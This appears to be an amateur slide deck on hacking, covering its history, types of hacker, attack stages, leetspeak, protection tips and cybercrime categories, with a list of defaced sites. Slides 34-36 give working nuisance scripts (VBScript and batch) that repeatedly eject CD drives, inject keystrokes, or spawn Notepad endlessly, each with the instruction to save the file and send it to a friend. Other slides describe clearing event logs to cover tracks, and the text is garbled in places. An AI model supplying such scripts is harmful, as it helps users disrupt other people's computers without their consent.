  • 6. History Of Hacking :-  1969 - Unix ‘hacked’ together  1971 - Cap ‘n Crunch phone exploit discovered  1988 - Morris Internet worm crashes 6,000 servers  1994 - $10 million transferred from CitiBank accounts  1995 - Kevin Mitnick sentenced to 5 years in jail  2000 - Major websites succumb to DDoS( distributed denial-of- service)  2000 - 15,700 credit and debit card numbers stolen fromWestern Union (hacked while web database was undergoing maintenance)  2001 Code Red ◦ exploited bug in MS IIS to penetrate & spread ◦ probes random IPs for systems running IIS ◦ had trigger time for denial-of-service attack ◦ 2nd wave infected 360000 servers in 14 hours  Code Red 2 - had backdoor installed to allow remote control  Nimda -used multiple infection mechanisms email, shares, web client, IIS  2002 – SlammerWorm brings web to its knees by attacking MS SQL Server
  • 7. Types Of Hacker 1.White Hat hacker :- breaks security for security perpose 2.Black hat Hacker : -break security for unauthorised use 3.Grey hat hacker :- Com. of white hat and black hat. They may offer to repaire the system. 4.Blue Hat hacker :- someone outside computer security who use the system 5.script kiddie :- Mostly student. Use tools created by black hats
  • 8. THE PROCESS OF HACKING Some common steps that hackers have to follow r as follows :- •Footprinting Before the real fun begins for hackers, the three essentials steps must be performed. Firstly , the hackers creates a profile of the company’s security posture. This is known as footprinting . Scanning The second step is that of scanning in which the hacker tests each target system to see if it is alive or not. •Enumeration Next, the hacker will try to identify valid user accounts and poorly protected resource shares, using enumeration process. •Gaining Access For target systems running Windows, hackers can guess passwords for enumerated user names, using an automatic tool and a list of passwords to try, and can be successful if a strong password policy is not followed and account lockouts r not implemented . •Tracks Covered Tracks can be disabled and then enabled by clearing the event log. •Backdoors There is a keystroke logger , which is between the OS and keyboard hardware and records every keystroke. On tracing its output hackers can easily identify what steps have done before and thus can identify the username and password
  • 9. Why do hackers hack? JUST FOR FUN SHOW OFF HACK OTHER SYSTEMS SECRETLY NOTIFY MANY PEOPLETHEIRTHOUGHT STEAL IMPORTANT INFORMATION DESTROY ENEMY’S COMPUTER NETWORK DURINGTHE WAR
  • 10. What do hackers do after hacking?(2) INSTALL IRC RELATED PROGRAM identd, irc, bitchx, eggdrop, bnc INSTALL SCANNER PROGRAM mscan, sscan, nmap INSTALL EXPLOIT PROGRAM INSTALL DENIAL OF SERVICE PROGRAM USE ALL OF INSTALLED PROGRAMS SILENTLY
  • 11. What do hackers know? DON’T KNOW HOWTO USEVI DON’T KNOWWHAT UNIX IS DON’T KNOWWHAT THEY DO KNOW HOWTO INTRUDETHE SYSTEM KNOW HOWTO CRASHTHE SYSTEM KNOWWHERETHE HACKING PROGRAMSARE
  • 12. How can kid hack? KID HAS MUCH OFTIME Kid can search for longer time than other people ALL HACKING PROGRAM IS EASYTO USE KID DOESN’T HAVETO KNOW HOW THE HACKING PROGRAMWORKS THESE KIDS ARE CALLED SCRIPT KIDDIES
  • 13. How can be a real hacker? STUDY C/C++/ASSEMBLYLANGUAGE STUDY COMPUTERARCHITECTURE STUDY OPERATING SYSTEM STUDY COMPUTER NETWORK EXAMINETHE HACKINGTOOLS FOR A MONTH THINKTHE PROBLEM OFTHE COMPUTER
  • 14. Why can’t defend against hackers? THERE ARE MANY UNKNOWN SECURITY HOLE HACKERS NEEDTO KNOW ONLY ONE SECURITY HOLETO HACKTHE SYSTEM ADMIN NEEDTO KNOWALL SECURITY HOLES TO DEFENDTHE SYSTEM
  • 15. What should do after hacked? SHUTDOWNTHE SYSTEM Or turn off the system SEPARATETHE SYSTEM FROM NETWORK RESTORETHE SYSTEM WITHTHE BACKUP Or reinstall all programs CONNECTTHE SYSTEM TOTHE NETWORK IT CAN BE GOODTO CALLTHE POLICE
  • 16. How to translate the hackers’ language (1) 1 -> i or l 3 -> e 4 -> a 7 -> t 9 -> g 0 -> o $ -> s | -> i or l || -> n |/| -> m s -> z z -> s f -> ph ph -> f x -> ck ck -> x
  • 17. How to translate the hackers’ language (2)  Ex) ◦ 1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1s wh3n 1 h4ck3d 1n ◦ I did not hack this page, it was like this when I hacked in
  • 18. Protect your Computers!  Use anti-virus software and firewalls - keep them up to date  Keep your operating system up to date with critical security updates and patches  Don't open emails or attachments from unknown sources  Use hard-to-guess passwords. Don’t use words found in a dictionary. Remember that password cracking tools exist  Back-up your computer data on disks or CDs often  Don't share access to your computers with strangers  If you have a wi-fi network, password protect it  Disconnect from the Internet when not in use  Reevaluate your security on a regular basis  Make sure your employees and family members know this info too!
  • 19.  Over the Internet  Over LAN  Locally  Offline  Theft  Deception Modes of Hacker Attack
  • 20.  Because they can ◦ A large fraction of hacker attacks have been pranks  Financial Gain  Espionage  Venting anger at a company or organization  Terrorism Why do Hackers Attack?
  • 21.  Active Attacks ◦ Denial of Service ◦ Breaking into a site  Intelligence Gathering  Resource Usage  Deception  Passive Attacks ◦ Sniffing  Passwords  Network Traffic  Sensitive Information ◦ Information Gathering Types of Hacker Attack
  • 22. Definition: An attacker alters his identity so that some one thinks he is some one else ◦ Email, User ID, IP Address, … ◦ Attacker exploits trust relation between user and networked machines to gain access to machines Types of Spoofing: 1. IP Spoofing: 2. Email Spoofing 3. Web Spoofing Spoofing
  • 23.  A hacker can exploit a weak passwords & uncontrolled network modems easily  Steps ◦ Hacker gets the phone number of a company ◦ Hacker runs war dialer program  If original number is 555-5532 he runs all numbers in the 555-55xx range  When modem answers he records the phone number of modem ◦ Hacker now needs a user id and password to enter company network  Companies often have default accounts e.g.temp, anonymous with no password  Often the root accountuses company name as the password  For strong passwords password cracking techniques exist Password Attacks
  • 24. Password Attacks  Two kinds: Password Guessing and Password Cracking  Password Guessing:Attempt to guess the password for a particular user ID.This process is rarely successful, time consuming, and generates a lot of network traffic. Also, some accounts are locked out after a set number of unsuccessful guesses. Many password-guessing tools can be found at Packet Site:
  • 25. Common scenarios in Cyber Crime Unauthorized access: This occurs when a user/hacker deliberately gets access into someone else’s network either to monitor or data destruction purposes Denial of service attack: It involves sending of disproportionate demands or data to the victims server beyond the limit that the server is capable to handle and hence causes the server to crash Virus, Worms and Trojan attacks: Viruses are basically programs that are attached to a file which then gets circulated to other files and gradually to other computers in the network. Worms unlike Viruses do not need a host for attachments they make copies of themselves and do this repeatedly hence eating up all the memory of the computer. Trojans are unauthorized programs which functions from inside what seems to be an authorized program, thereby concealing what it is actually doing.
  • 26. Email Bombing It refers to sending a large number of emails to the victim resulting in the victim's email account (in case of an individual) or mail servers (in case of a company or an email service provider) crashing Internet Time Thefts This connotes the usage by an unauthorized person of the Internet hours paid for by another. Web Jacking This occurs when someone forcefully takes control of a website (by cracking the password and later changing it). The actual owner of the website does not have any more control over what appears on that website Theft and Physical damage of computer or its peripherals This type of offence involves the theft of a computer, some parts of a computer or a peripheral attached to the computer. and physically damaging a computer or its peripherals
  • 28. IP ADDRESS IP ADDRESS ISTHE ADDRESS OFYOUR COMPUTER INTHE INTERNET IT IS UNIQ LIKE 192.168.23.45
  • 30. ARP Cache Poisoning IP -> 192.168.51.36 MAC -> 00:00:00:BB:BB:BB Internal ARP Cache 192.168.51.35 – 00:00:00:CC:CC:CC System B IP -> 192.168.51.35 MAC -> 00:00:00:AA:AA:AA Internal ARP Cache 192.168.51.36 – 00:00:00:CC:CC:CC System A IP -> 192.168.51.37 MAC -> 00:00:00:CC:CC:CC Internal ARP Cache 192.168.51.36 – 00:00:00:BB:BB:BB 192.168.51.35 – 00:00:00:AA:AA:AA Attacker 192.168.51.36 is at 00:00:00:CC:CC:CC 192.168.51.35 is at 00:00:00:CC:CC:CC
  • 31. Knowing IP addresses  IP address is a unique web address for each computer connected to internet  Knowing this is essential before anything else
  • 32. Symptoms  Targeted Pop-ups  Slow Connection  Targeted E-Mail (Spam)  UnauthorizedAccess  Spam Relaying  System Crash  Program Customisation SPYWARE SPYWARE / TROJAN SPYWARE TROJAN HORSE TROJAN HORSE SPYWARE/ TROJAN SPYWARE 32
  • 33. Small NotepadVirus :- More Notepad Viruses
  • 34. 1)Continually pop out your friend's CD Drive. Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Save it as "Anything.VBS" and send it.
  • 35. Hack Computer keyboard and make him type “Keyboard not working" simultaneously: Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys“Keyboard not working" loop Save it as "Anything.VBS" and send it.
  • 36. Open Notepad continually in your computer @ECHO off :top START %SystemRoot%system32notepad.exe GOTO top Save it as “Anything.BAT" and send it.
  • 37. LIST OF SITES THAT WERE HACKED •-Monmouth Army Base --- http://www.monmouth.army.mil/ •-US Army --- http://www4.army.mil/ •-The Jerry Springer Show --- http://www.jerryspringer.com/ •-Symantec Corporation --- http://www.symantec.com/ •-U.S. Department of Commerce Institute for Telecommunication Sciences --- http://elbert.its.bldrdoc.gov/ •-Technical University of Denmark --- http://lanpc11.ilf.dtu.dk •Illinois Natural History Survey --- http://nuclear.hazard.uiuc.edu • Monica Lewinsky's site ---http://www.monicalewinsky.com/ •Phoenix Data Systems ---http://www.phoenixds.at/ •Ruchi Group ---http://www.ruchigroup.com/ •Concept Reseau ---http://www.concept-reseau.fr/ •Wayne University US Department ---http://www.us.wayne.edu/